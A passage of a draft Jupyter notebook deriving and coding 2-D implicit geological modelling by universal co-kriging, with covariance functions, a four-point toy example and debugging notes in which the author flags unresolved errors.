we can consider the deposition of sedimentary sequences, for example in a marine environment: we may observe a sequence of more sand-dominated and more clay-dominated units. In a quiet and continuous sedimentation environment, we can assume that we have wide lateral continuity and a \"layer-by-layer\" deposition.\n\nIn the context of geomodeling, we may attempt to describe now these sedimented zones by the interface surfaces between them. It is then obvious that these surfaces should not cross (considering no disturbance during sedimentation). Furthermore, we can assume that the layers show a specific influence on each other: to first order, they can be considered as parallel. And, maybe for a finer distinction, we can assume that a (topographic) variability of in one layer (for example a sea mound, to stay in our example) has a certain upward continuation and can potentially still be apparent (though to a lesser extent) on the next interface above.\n\nWe can now take a more abstract view and assume that we do not only have two or three interfaces, but more or less a continuous description of subsequent layers, representing a continuous sedimentation process and showing a similar continuous influence on each other, and the layer interfaces can not cross. \n\nWith this intuition, we can describe these layer interfaces as isosurfaces in a scalar field. In our example, we can even interpret the scalar field values as related to a specific depositional age (note that this notion will not generally be possible - nor a requirement). Even further, we can interpret the gradient of this scalar field as orientation values, i.e. measurements of strike/ dip/ dip direction in a geological sequence.\n\nThe question now is: how can we interpolate this scalar field from a set of limited observations of surface contact points and orientation measurements?",
"_____no_output_____"
],
[
"## Notation and scalar field interpolation\n\nMultiple methods are possible to obtain this scalar field. A very common approach (mostly from the field of image segmentation, but also applied in geophysics) is to use a Level Set formulation (Chan & Vese?). Other previous approaches implemented Radial Basis Functions (RBF's, e.g. the implementation in LeapFrog, see also Hillier, 2014) and a stochastic time interpretation (? Mallet 2004 - the GoCAD implicit modeling approach). We use here a geostatistical method based on (universal) co-kriging, described in Lajaunie et al., 1997.\n\nWe denote the 3-D surface in an *implicit* form (therefore also the name of these methods as \"implicit geomodeling\"), associated with a function $\\psi_\\alpha$ such that (Lajaunie et al., 1997):\n\n$$C_\\alpha = \\{x : \\psi_a(x) = 0 \\}$$\n\n\nWe describe the scalar field that we aim to obtain as a function $T( \\vec{x} )$. \n\nNext, we denote $Z$ as a realization of the (differentiable) random function $\\psi$. We now use a kriging method to to estimate $Z$ in the entire domain of interest.\n\nNote: important basic principle: multivariate (co-)kriging, IRK-f model (Matheron!) CHECK!!\n\nHowever, co-kriging is not \"standard\" form, as variables are algebraically linked!\n\nMore notation:\n\nGradient data:\n\n$$\\frac{\\partial Z}{\\partial x} (x_i) = G_i^x$$\n\n$$\\frac{\\partial Z}{\\partial y} (x_i) = G_i^y$$\n\nTangent vector $\\tau_i$ is defined through a scalar product:\n\n$$ <\\nabla Z(x_i), \\tau_i > = 0$$\n\nPoints on a single interface belong to a single set $J_k$, $k$ is the index of the interface.\n\nIncrements for points on a single interface, the increments must be zero:\n\n$$Z(x_j) - Z(x_{j'}) = 0 \\;\\;\\forall (j,j') \\in J_k$$\n\n\n### The spatial model\n\nAs we only consider increments, we can only obtain a (unique) solution when we fix/ select an arbitrary origin $x_0$ and we estimate increments with respect to this origin:\n\n$$Z(x) - Z(x_0) = \\sum_{i \\in I} \\left( \\lambda_i G_i^x + \\mu_i G_i^y \\right) + \\sum_{i' + I'} <\\nabla Z(x_{i'}), \\tau_{i'} > + \\sum_k \\sum_{jj' \\in \\mathcal{P}(J_k)} \\lambda_{jj'}[Z(x_j) - Z(x_{j'})] $$ \n\n\n$\\mathcal{P}(J_k)$ is the set of pairs associated with one interface $J_k$. Note that, in this formulation, the contribution from the scalar field increments for points on one interface $Z(x_j) - Z(x_{j'})$ would theoretically be zero. However, the consideration of this (zero-)increment is essential in order to obtain the co-kriging equations, in which these terms will matter (see below).\n\nIn a sense, the interpolation can be interpreted as a co-kriging of increments and gradients. Chiles (2004) actually describes it as a kriging of a gradient field - with the additional contribution of \"zero-increment\" constraints for points on one interface. \n\n### Derivation of the co-kriging equations\n\n\n(See Chiles book for derivation of universal co-kriging equations!)\n\nWe now have to set up the kriging equation to solve for the parameters/ coefficients $\\lambda_i, \\mu_i, \\lambda_{jj'}$ in order to obtain an (explicit?) equation that we can use to determine the potential field value at any point in space.",
"_____no_output_____"
],
[
"### Covariance functions\n\nThe situation is (a \"bit\") complicated by the fact that we have to consider all covariances and cross-covariances of each function involved.\n\n\n(Side note/ Idea/ Check: can the same form of co-kriging be used in the context of posterior-space estimation/ reduced order modeling, etc. - i.e. all the cases where kriging is used, also ML? Because: we could estimate the gradient quite easily using AD-methods and the approach could lead to a more robust estimate? )\n\nFor simplicity in the description, we consider an isotropic covariance field. We follow the description in Lajaunie et al. (1997) and denote the covariance of $Z$ as $K_Z$. Furthermore, a vector connecting two points in space is:\n\n$$\\vec{h} = \\vec{x} - \\vec{y}$$\n\nAnd the components of this vector in $x$- and $y$-direction respectively are $h_x$ and $h_y$. The base covariance function is:\n\n$$K_Z(\\vec{h}) = C_Z(r)$$\n\nIn order for $Z$ to be differentiable, $K_Z$ must be twice differentiable. Under these conditions (??), the covariances are:\n\n$$K_{ZG^x}(\\vec{x} - \\vec{y})= Cov(Z(x),Z_x'(y)) = - \\frac{h_x}{r} C_Z'(r)$$\n\nSimilar:\n\n$$K_{G^x G^y}((\\vec{x} - \\vec{y})$$\n\n$$K_{G^x}((\\vec{x} - \\vec{y})$$\n\nAs a first test, we use the covariance functions defined in Lajaunie et al. for the Gaussian model (pg. 578):\n\nIf\n\n$$C(r) = \\exp{-(r/a)^2}$$\nthen:\n\n$$K_{ZG^x}(\\vec{h}) = -2 \\frac{h_x}{a^2} C(r)$$\n\n$$K_{G^x}(\\vec{h}) = \\left(\\frac{2}{a^2} - 4 \\frac{x^2}{a^4} \\right) C(r)$$\n\n$$K_{G^x G^y}(\\vec{h}) = -4 \\frac{h_x h_y}{a^4} C(r)$$\n\nwhere $\\vec{h} = \\vec{x} - \\vec{y}$, $r = |\\vec{h}|$ and $h_x$ the component of $\\vec{h}$ in $x$-direction, etc.\n\n<div class=\"alert alert-info\">\n <strong>To do (Miguel?):</strong> Include better covariance function (spline?).\n</div>\n\n**To Do**\": Include equations for cubic covariance functions (see notebook and description in paper of Miguel)",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\n%matplotlib inline",
"_____no_output_____"
],
[
"# define covariance functions (note: no nugget effect so far...):\n\ndef K_Z(h, a=25.):\n r = np.sqrt(h[0]**2 + h[1]**2)\n return np.exp(-(r/a)**2)\n \n# cross-cov space-grad\ndef K_ZGx(h, a=25.):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n return -2 * hx/a**2 * K_Z(h,a) * 5\n\ndef K_ZGy(h, a=25.):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hy = h[1] \n return -2 * hy/a**2 * K_Z(h,a) * 5\n\n# cov grad\ndef K_Gx(h, a=25.):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n return (2/a**2 - 4 * hx**2/a**4) * K_Z(h,a)* 5\n\ndef K_Gy(h, a=25.):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hy = h[1]\n return (2/a**2 - 4 * hy**2/a**4) * K_Z(h,a)* 5\n\n# cross-cov grad\ndef K_GxGy(h, a=25.):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n hy = h[1]\n return -4 * hx * hy /a**4 * K_Z(h,a)* 5\n\n \n# From Miguel's prototype notebooks\n\ndef cov_cubic_f(r, a = 1):\n c_o = a**2/14/3\n if r > a:\n ans_d0 = 0\n else:\n ans_d0 = c_o*(1-7*(r/a)**2+35/4*(r/a)**3-7/2*(r/a)**5+3/4*(r/a)**7)\n # ans_d0[r>a] = 0\n return ans_d0\n\ncov_cubic_f = np.vectorize(cov_cubic_f)\n\ndef cov_cubic_d1_f(r, a = 1.):\n c_o = a**2/14/3\n if r>a:\n ans_d1 = 0\n else:\n ans_d1 = (-7* (a - r)**3 *r* (8* a**2 + 9 *a* r + 3* r**2)* (c_o))/(4* a**7)\n return ans_d1\n\ncov_cubic_d1_f = np.vectorize(cov_cubic_d1_f)\n \ndef cov_cubic_d2_f(r, a = 1.):\n c_o = a**2/14/3\n if r>a:\n ans_d2 = 0\n else:\n ans_d2 = (-7 * (4.* a**5. - 15. *a**4. * r + 20. *( a**2)*(r**3) - 9* r**5) * \n (c_o))/(2*a**7)\n return ans_d2\n\ncov_cubic_d2_f = np.vectorize(cov_cubic_d2_f)\n\n\n# Now, adjust coariance functions from above:\n\ndef K_Z(h):\n r = np.sqrt(h[0]**2 + h[1]**2)\n return cov_cubic_f(r)\n\n# cross-cov space-grad\ndef K_ZGx(h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n return -hx/r * cov_cubic_d1_f(r)\n\ndef K_ZGy(h, a=5.):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hy = h[1] \n return -hy/r * cov_cubic_d1_f(r)\n\n# cov grad\ndef K_Gx(h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n if r == 0:\n return 1/3.\n else:\n return (hx**2/r**3 - 1/r) * cov_cubic_d1_f(r) - (hx/r)**2 * cov_cubic_d2_f(r)\n\ndef K_Gy(h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hy = h[1]\n if r == 0:\n return 1/3.\n else:\n return (hy**2/r**3 - 1/r) * cov_cubic_d1_f(r) - (hy/r)**2 * cov_cubic_d2_f(r)\n\n# cross-cov grad\ndef K_GxGy(h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n hy = h[1]\n if r == 0:\n return 0\n else:\n return hx * hy /r**2 * (1/r * cov_cubic_d1_f(r) - cov_cubic_d2_f(r))\n",
"_____no_output_____"
]
],
[
[
"Create a plot of the cubic covariance functions:",
"_____no_output_____"
]
],
[
[
"rs = np.arange(0.01,2,0.01)\nhs = np.vstack([-rs, rs]).transpose()\n# determine h-vectors:\nv1 = cov_cubic_f(rs)\n# for h vector: use 45 degrees/ [1,1]-direction with increasing distance\nplt.plot(rs, v1, label='C(r)')\nplt.plot(rs, cov_cubic_d1_f(rs), label='C\\'(r)')\nplt.plot(rs, cov_cubic_d2_f(rs), label='C\\'\\'(r)')\n\n# v2 = [K_ZGx(h) for h in hs]\n# plt.plot(rs, v2, label='K_ZGx')\n# plt.plot(rs, K_ZGy(rs))\n# plt.plot(rs, [K_Gx(h) for h in hs], label='K_Gx')\n# plt.plot(rs, [K_GxGy(h) for h in hs], label='K_GxGy')\nplt.legend(loc='best')\nplt.show()",
"_____no_output_____"
],
[
"print(cov_cubic_d2_f(rs)[0])",
"-0.32083499992500003\n"
],
[
"rs = np.arange(0.01,10,0.01)\nhs = np.vstack([-rs, rs]).transpose()\n# determine h-vectors:\nv1 = [K_Z(h) for h in hs]\n# for h vector: use 45 degrees/ [1,1]-direction with increasing distance\nplt.plot(rs, v1, label='K_Z')\n# plt.plot(rs, cov_cubic_d1_f(rs), label='C\\'(r)')\n# plt.plot(rs, cov_cubic_d2_f(rs), label='C\\'\\'(r)')\n\nv2 = [K_ZGx(h) for h in hs]\nplt.plot(rs, v2, label='K_ZGx')\n# plt.plot(rs, K_ZGy(rs))\nplt.plot(rs, [K_Gx(h) for h in hs], label='K_Gx')\nplt.plot(rs, [K_GxGy(h) for h in hs], label='K_GxGy')\nplt.legend(loc='best')\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Universality conditions\n\n\n(Miguel?)",
"_____no_output_____"
],
[
"### Dual form\n\nUnder the above conditions, we can actually write the kriging equations in the dual form and finally obtain the estimator:\n\n",
"_____no_output_____"
],
[
"## Simple example: 4 points, one gradient\n\nWe first start with a very simple example: twi interfaces iwth two points each, and one common gradient.\n\n<div class=\"alert alert-info\">\n <strong>To do:</strong> Include sketch of points and gradient.\n</div>",
"_____no_output_____"
]
],
[
[
"# interface points:\n# interface 1:\nx1 = [0,0]\nx2 = [1,0]\nx_int1 = np.vstack([x1,x2])\n# interface 2:\nx3 = [0,1]\nx4 = [1,1]\nx_int2 = np.vstack([x3,x4])\n# orientation point:\nx5 = [0,0.5]\nx = np.vstack([x1, x2, x3, x4, x5])\n# orientation values\ngx5 = 1.\ngy5 = 1.",
"_____no_output_____"
],
[
"plt.plot(x_int1[:,0], x_int1[:,1], 'ro')\nplt.plot(x_int2[:,0], x_int2[:,1], 'bo')\nplt.plot(x5[0], x5[1], 'go')",
"_____no_output_____"
]
],
[
[
"### Calculate distance matrix\n\n(Note: not required anymore for this implementation - as h-vectors used...)\n",
"_____no_output_____"
]
],
[
[
"import scipy.spatial.distance as dist\n",
"_____no_output_____"
],
[
"d = dist.squareform(dist.pdist(x))",
"_____no_output_____"
],
[
"d[1,0], d[0,1]",
"_____no_output_____"
],
[
"x[:2], x[1] - x[0]",
"_____no_output_____"
]
],
[
[
"### Set up K matrix\n\nWe follow the K-matrix setup described in the Appendix of Lajaunie et al. (pg. 584):\n\nNote: we have to use the spacing vector $\\vec{h}$ instead of simply the (radial) distance $r$ in order to get correctly calculated covariance values:",
"_____no_output_____"
]
],
[
[
"# Previous implementation:\n# K = np.array([[K_Gx(d[4,4]), K_GxGy(d[4,4]), K_ZGx(d[4,0])-K_ZGx(d[4,1]), K_ZGx(d[4,2])-K_ZGx(d[4,3])],\n# [K_GxGy(d[4,4]), K_Gy(d[4,4]), K_ZGy(d[4,0])-K_ZGy(d[4,1]), K_ZGy(d[4,2])-K_ZGy(d[4,3])],\n# [K_ZGx(d[0,4])-K_ZGx(d[1,4]), K_Gy(d[0,4])-K_ZGy(d[1,4]), K_Z(d[0,0])-K_Z(d[0,1])-K_Z(d[1,0])+K_Z(d[1,1]), K_Z(d[0,2])-K_Z(d[0,3])-K_Z(d[1,2])+K_Z(d[1,3])],\n# [K_ZGx(d[0,4])-K_ZGx(d[1,4]), K_Gy(d[0,4])-K_ZGy(d[1,4]), K_Z(d[0,0])-K_Z(d[0,1])-K_Z(d[1,0])+K_Z(d[1,1]), K_Z(d[0,2])-K_Z(d[0,3])-K_Z(d[1,2])+K_Z(d[1,3])]])\n\nK = np.array([[K_Gx(x[4]-x[4]), K_GxGy(x[4]-x[4]), K_ZGx(x[4]-x[0])-K_ZGx(x[4]-x[1]), K_ZGx(x[4]-x[2])-K_ZGx(x[4]-x[3])],\n [K_GxGy(x[4]-x[4]), K_Gy(x[4]-x[4]), K_ZGy(x[4]-x[0])-K_ZGy(x[4]-x[1]), K_ZGy(x[4]-x[2])-K_ZGy(x[4]-x[3])],\n [K_ZGx(x[0]-x[4])-K_ZGx(x[1]-x[4]), K_ZGy(x[0]-x[4])-K_ZGy(x[1]-x[4]), K_Z(x[0]-x[0])-K_Z(x[0]-x[1])-K_Z(x[1]-x[0])+K_Z(x[1]-x[1]), K_Z(x[0]-x[2])-K_Z(x[0]-x[3])-K_Z(x[1]-x[2])+K_Z(x[1]-x[3])],\n [K_ZGx(x[2]-x[4])-K_ZGx(x[3]-x[4]), K_ZGy(x[2]-x[4])-K_ZGy(x[3]-x[4]), K_Z(x[2]-x[0])-K_Z(x[2]-x[1])-K_Z(x[3]-x[0])+K_Z(x[3]-x[1]), K_Z(x[2]-x[2])-K_Z(x[2]-x[3])-K_Z(x[3]-x[2])+K_Z(x[3]-x[3])]])",
"_____no_output_____"
],
[
"x[0]",
"_____no_output_____"
],
[
"K",
"_____no_output_____"
],
[
"np.linalg.cond(K)",
"_____no_output_____"
],
[
"np.linalg.inv(K)",
"_____no_output_____"
]
],
[
[
"Ok, this first step looks reasonable now. Theoretically, we could now solve the kriging system without the universality conditions:",
"_____no_output_____"
]
],
[
[
"# setting up the RHS - only gradient in x,y directions:\nb = [gx5,gy5,0,0]",
"_____no_output_____"
],
[
"w = np.linalg.solve(K, b)\nprint(w)",
"[ 3. 2.60865758 1.89025774 -1.89025774]\n"
]
],
[
[
"Ok, weights are large - let's see what we actually interpolate - in writing the interpolator function (1) without a drift term:\n\n$$Z(x_\\alpha)^K = a_5 K_{ZG^x}^{\\alpha 5} + b_5 K_{ZG^y}^{\\alpha 5} + c_{12}(K_Z^{\\alpha 1} - K_Z^{\\alpha 2})\n+ c_{34}(K_Z^{\\alpha 3} - K_Z^{\\alpha 4})$$",
"_____no_output_____"
]
],
[
[
"def interp_val(xa, w, x):\n \"\"\"Determine interpolation for scalar field value (without drift)\n \n Parameters:\n xa = [x,y]: x-vector to point of estimation\n w = [a,b,c1,c2]: estimnated weights\n x = (n,2)-vector of known value positions\n \"\"\"\n return w[0]*K_ZGx(xa - x[4]) + \\\n w[1]*K_ZGy(xa - x[4]) + \\\n w[2]*(K_Z(xa-x[0])-K_Z(xa-x[1])) + \\\n w[3]*(K_Z(xa-x[2])-K_Z(xa-x[3]))\n ",
"_____no_output_____"
],
[
"interp_val([2,3], w, x)",
"_____no_output_____"
]
],
[
[
"And in a map-view:",
"_____no_output_____"
]
],
[
[
"# create points:\nxx = np.arange(-.5,1.5,0.1)\nyy = np.arange(-.5,1.5,0.1)\nXX,YY = np.meshgrid(xx,yy)",
"_____no_output_____"
],
[
"scalar_field_no_drift = np.empty((len(xx), len(yy)))\nfor i,xxx in enumerate(xx):\n for j,yyy in enumerate(yy):\n scalar_field_no_drift[i,j] = interp_val([xxx,yyy], w, x)",
"_____no_output_____"
],
[
"plt.contour(XX, YY, scalar_field_no_drift.T, 20)\nplt.colorbar()\nplt.plot(x_int1[:,0], x_int1[:,1], 'ro')\nplt.plot(x_int2[:,0], x_int2[:,1], 'bo')\nplt.plot(x5[0], x5[1], 'go')\nplt.axis('equal')",
"_____no_output_____"
]
],
[
[
"\n<div class=\"alert alert-danger\">\n <strong>Check:</strong> The result obviously does not make sense... is this because of the missing drift or is it a problem in the implementation?\n</div>\n\n",
"_____no_output_____"
],
[
"## Adding universal kriging terms\n\nWe now add the universal kriging terms in order to obtain a meaningful drift/ variability in the interpolated scalar field. How these additional terms are included is not so directly obvious from Lajaunie et al., but the description in the appendix for a second-order drift provides some insight.\n\n\n<div class=\"alert alert-info\">\n <strong>To do:</strong> Include more information - and reference to gempy paper?\n</div>\n\n### Set up F-matrix",
"_____no_output_____"
]
],
[
[
"# new 25.11.2019\nF = np.array([[1, 0, 1, 1],\n [0, 1, 0, 0]])",
"_____no_output_____"
]
],
[
[
"Combine matrices:",
"_____no_output_____"
]
],
[
[
"A = np.hstack([K, F.transpose()])\nB = np.hstack([F, np.zeros((2,2))])\nkrig_full = np.vstack([A,B])",
"_____no_output_____"
],
[
"krig_full, krig_full.shape",
"_____no_output_____"
],
[
"b = np.zeros(6)\nb[0] = gx5\nb[1] = gy5",
"_____no_output_____"
],
[
"w = np.linalg.solve(krig_full, b)\nw",
"_____no_output_____"
]
],
[
[
"### Interpolation function with universal drift\n\n",
"_____no_output_____"
]
],
[
[
"def interp_val_with_drift(xa, w, x):\n \"\"\"Determine interpolation for scalar field value\n \n Parameters:\n xa = [x,y]: x-vector to point of estimation\n w = [a,b,c1,c2]: estimnated weights\n x = (n,2)-vector of known value positions\n \"\"\"\n return w[0]*K_ZGx(xa - x[4]) + \\\n w[1]*K_ZGy(xa - x[4]) + \\\n w[2]*(K_Z(xa-x[0])-K_Z(xa-x[1])) + \\\n w[3]*(K_Z(xa-x[2])-K_Z(xa-x[3])) + \\\n w[4]*xa[0] + w[5]*xa[1]\n ",
"_____no_output_____"
],
[
"# create points:\nxx = np.arange(-.5,1.5,0.1)\nyy = np.arange(-.5,1.5,0.1)\nXX,YY = np.meshgrid(xx,yy)",
"_____no_output_____"
],
[
"scalar_field_no_drift = np.empty((len(xx), len(yy)))\nfor i,xxx in enumerate(xx):\n for j,yyy in enumerate(yy):\n scalar_field_no_drift[i,j] = interp_val_with_drift([xxx,yyy], w, x)",
"_____no_output_____"
],
[
"plt.contour(XX, YY, scalar_field_no_drift.T, 20)\nplt.colorbar()\nplt.plot(x_int1[:,0], x_int1[:,1], 'ro')\nplt.plot(x_int2[:,0], x_int2[:,1], 'bo')\nplt.plot(x5[0], x5[1], 'go')\nplt.axis('equal')",
"_____no_output_____"
]
],
[
[
"# Old below",
"_____no_output_____"
]
],
[
[
"K",
"_____no_output_____"
],
[
"x",
"_____no_output_____"
],
[
"x_all = x\nF = np.array([[1, 0, x_all[0,0]-x_all[1,0], x_all[2,0]-x_all[3,0]],\n [0, 1, x_all[0,1]-x_all[1,1], x_all[2,1]-x_all[3,1]],\n [2*x_all[4,0], 0, x_all[0,0]**2-x_all[1,0]**2, x_all[2,0]**2-x_all[3,0]**2],\n [0, 2*x_all[4,1], x_all[0,1]**2-x_all[1,1]**2, x_all[2,1]**2-x_all[3,1]**2],\n [x_all[4,1], x_all[4,0], x_all[0,0]*x_all[0,1]-x_all[1,0]*x_all[1,1], x_all[2,0]*x_all[2,1]-x_all[3,0]*x_all[3,1]]])",
"_____no_output_____"
],
[
"F",
"_____no_output_____"
]
],
[
[
"### Combine in full matrix",
"_____no_output_____"
]
],
[
[
"A = np.hstack([K, F.transpose()])\nB = np.hstack([F, np.zeros((5,5))])\nkrig_full = np.vstack([A,B])",
"_____no_output_____"
],
[
"krig_full, krig_full.shape",
"_____no_output_____"
]
],
[
[
"### Set up b-vector (RHS)",
"_____no_output_____"
]
],
[
[
"b = np.zeros(9)\nb[0] = gx5\nb[1] = gy5",
"_____no_output_____"
],
[
"b",
"_____no_output_____"
]
],
[
[
"### Solve system of algebraic equations",
"_____no_output_____"
]
],
[
[
"np.linalg.solve(krig_full, b)",
"_____no_output_____"
]
],
[
[
"Bam!",
"_____no_output_____"
]
],
[
[
"np.linalg.inv(K)",
"_____no_output_____"
],
[
"krig_full.shape",
"_____no_output_____"
]
],
[
[
"Why is the inversion failing? Problem with the setup of the universal part (I assume)? Or is the point configuration too similar?\n\nApproach: try pseudo-inverse instead:",
"_____no_output_____"
]
],
[
[
"weights = np.dot(np.linalg.pinv(krig_full), b)",
"_____no_output_____"
],
[
"weights",
"_____no_output_____"
]
],
[
[
"Hmmm... some values are very small - no contribution from the gradients, especially... basically, only the drift values are considered?\n\nLet's see: interpolate!\n\nThe weight vector now contains the parameters: $w = [a_5, b_5, c_{12}, c_{34}, d_1, d_2, d_3, d_4, d_5]$. \n\nIn our example (at the moment), the solution seems to be completely determined by the drift value.",
"_____no_output_____"
],
[
"### Interpolate values\n\nUse equation (1) on page 577 from Lajaune et al.:\n\n$$Z(x_\\alpha)^K = a_5 K_{ZG^x}^{\\alpha 5} + b_5 K_{ZG^y}^{\\alpha 5} + c_{12}(K_Z^{\\alpha 1} - K_Z^{\\alpha 2})\n+ c_{34}(K_Z^{\\alpha 3} - K_Z^{\\alpha 4}) + d_1$$\n\n\n",
"_____no_output_____"
]
],
[
[
"x_alpha = [2,2]\n",
"_____no_output_____"
],
[
"interp_val(x_alpha, weights, x_all)",
"_____no_output_____"
]
],
[
[
"### Combined in one function\n\nFor better testing purposes, here the model generation in a class definition:",
"_____no_output_____"
]
],
[
[
"class GeomodelCokriging(object):\n \n def __init__(self):\n \"\"\"Two-dimensional geomodel interpolation using the potential-field approach\n \n Note: only for instructive purposes - for a real model, please use GemPy!\n \"\"\"\n # set covariance model range:\n self.a = 5.\n\n def K_Z(self, h):\n r = np.sqrt(h[0]**2 + h[1]**2)\n return np.exp(-(r/self.a)**2)\n\n # cross-cov space-grad\n def K_ZGx(self, h):\n \"\"\"Note: requires the vector h!\"\"\"\n # r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n return -2 * hx/self.a**2 * self.K_Z(h) \n\n def K_ZGy(self, h):\n \"\"\"Note: requires the vector h!\"\"\"\n # r = np.sqrt(h[0]**2 + h[1]**2)\n hy = h[1] \n return -2 * hy/self.a**2 * self.K_Z(h) \n\n # cov grad\n def K_Gx(self, h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n return (2/self.a**2 - 4 * hx**2/self.a**4) * self.K_Z(h) \n\n def K_Gy(self, h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hy = h[1]\n return (2/self.a**2 - 4 * hy**2/self.a**4) * self.K_Z(h) \n\n # cross-cov grad\n def K_GxGy(self, h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n hy = h[1]\n return -4 * hx * hy /self.a**4 * self.K_Z(h) \n\n def set_points(self, points):\n \"\"\"Define points for interfaces, pass as dictionary\n \n points = 1 : [x1, x2], 2: [x3, x4]}\n \"\"\"\n self.points = points\n \n def set_ori(self, ori):\n \"\"\"Set position and gradient of orientation\n \n ori = {'pos' : x5, 'grads' : [gx5, gy5]}\n \"\"\"\n self.ori = ori\n \n def setup_K_matrix(self):\n x = np.vstack([self.points[1], self.points[2], self.ori['pos']])\n self.K = np.array([\n [self.K_Gx(x[4]-x[4]), self.K_GxGy(x[4]-x[4]), self.K_ZGx(x[4]-x[0])-self.K_ZGx(x[4]-x[1]), self.K_ZGx(x[4]-x[2])-self.K_ZGx(x[4]-x[3])],\n [self.K_GxGy(x[4]-x[4]), self.K_Gy(x[4]-x[4]), self.K_ZGy(x[4]-x[0])-self.K_ZGy(x[4]-x[1]), self.K_ZGy(x[4]-x[2])-self.K_ZGy(x[4]-x[3])],\n [self.K_ZGx(x[0]-x[4])-self.K_ZGx(x[1]-x[4]), self.K_ZGy(x[0]-x[4])-self.K_ZGy(x[1]-x[4]), self.K_Z(x[0]-x[0])-self.K_Z(x[0]-x[1])-self.K_Z(x[1]-x[0])+self.K_Z(x[1]-x[1]), self.K_Z(x[0]-x[2])-self.K_Z(x[0]-x[3])-self.K_Z(x[1]-x[2])+self.K_Z(x[1]-x[3])],\n [self.K_ZGx(x[2]-x[4])-self.K_ZGx(x[3]-x[4]), self.K_ZGy(x[2]-x[4])-self.K_ZGy(x[3]-x[4]), self.K_Z(x[2]-x[0])-self.K_Z(x[2]-x[1])-self.K_Z(x[3]-x[0])+self.K_Z(x[3]-x[1]), self.K_Z(x[2]-x[2])-self.K_Z(x[2]-x[3])-self.K_Z(x[3]-x[2])+self.K_Z(x[3]-x[3])]])\n # magic miguel fix:\n # self.K[0,0] = 1./3.\n # self.K[1,1] = 1./3.\n \n \n def setup_RHS(self):\n # setting up the RHS - only gradient in x,y directions:\n self.b = [self.ori['grads'][0],self.ori['grads'][1],0,0]\n \n def solve(self):\n self.setup_K_matrix()\n self.setup_RHS()\n self.w = np.linalg.solve(self.K, self.b)\n \n def interp_val(self, xa, w, x):\n \"\"\"Determine interpolation for scalar field value (without drift)\n\n Parameters:\n xa = [x,y]: x-vector to point of estimation\n w = [a,b,c1,c2]: estimnated weights\n x = (n,2)-vector of known value positions\n \n bla\n \"\"\"\n val = w[0]*K_ZGx(xa - x[4]) + \\\n w[1]*K_ZGy(xa - x[4])# + \\\n# w[2]*(K_Z(xa-x[0])-K_Z(xa-x[1])) + \\\n# w[3]*(K_Z(xa-x[2])-K_Z(xa-x[3]))\n return val\n\n\n def plot(self):\n \"\"\"Plot points and interpolated field\"\"\"\n # create points:\n xx = np.arange(-.5,1.5,0.1)\n yy = np.arange(-.5,1.5,0.1)\n XX,YY = np.meshgrid(xx,yy)\n scalar_field_no_drift = np.empty((len(xx), len(yy)))\n for i,xxx in enumerate(xx):\n for j,yyy in enumerate(yy):\n scalar_field_no_drift[i,j] = self.interp_val([xxx,yyy], self.w, x)\n \n # create plot\n plt.contour(XX, YY, scalar_field_no_drift.T, 20)\n plt.colorbar()\n plt.plot(self.points[1][:,0], self.points[1][:,1], 'ro')\n plt.plot(self.points[2][:,0], self.points[2][:,1], 'bo')\n plt.plot(self.ori['pos'][0], self.ori['pos'][1], 'go')",
"_____no_output_____"
],
[
"points = {1 : np.array([x1, x2]), 2: np.array([x3, x4])}\nori = {'pos' : x5, 'grads' : [1., 1.]}\ngeomodel = GeomodelCokriging()",
"_____no_output_____"
],
[
"geomodel.set_points(points)\ngeomodel.set_ori(ori)",
"_____no_output_____"
],
[
"geomodel.solve()",
"_____no_output_____"
],
[
"geomodel.plot()",
"_____no_output_____"
],
[
"help(geomodel.interp_val)",
"_____no_output_____"
]
],
[
[
"Test different range values:",
"_____no_output_____"
]
],
[
[
"geomodel.a = 5.\ngeomodel.solve()\ngeomodel.plot()",
"_____no_output_____"
]
],
[
[
"Interesting... the gradient seems to be influenced too much by the covariance function!",
"_____no_output_____"
]
],
[
[
"geomodel.K",
"_____no_output_____"
],
[
"geomodel.K[0,0] = 1./3.\ngeomodel.K[1,1] = 1./3.",
"_____no_output_____"
],
[
"geomodel.solve()\ngeomodel.plot()",
"_____no_output_____"
],
[
"geomodel.K",
"_____no_output_____"
]
],
[
[
"## Debugging cokriging\n",
"_____no_output_____"
]
],
[
[
"points = {1 : np.array([x1, x2]), 2: np.array([x3, x4])}\nori = {'pos' : x5, 'grads' : [10., 1.]}\ngeomodel = GeomodelCokriging()\ngeomodel.set_points(points)\ngeomodel.set_ori(ori)\ngeomodel.solve()\ngeomodel.K = geomodel.K[:2,:2]\ngeomodel.b = geomodel.b[:2]",
"_____no_output_____"
],
[
"geomodel.w = np.linalg.solve(geomodel.K, geomodel.b)",
"_____no_output_____"
],
[
"geomodel.plot()",
"_____no_output_____"
],
[
"geomodel.w",
"_____no_output_____"
],
[
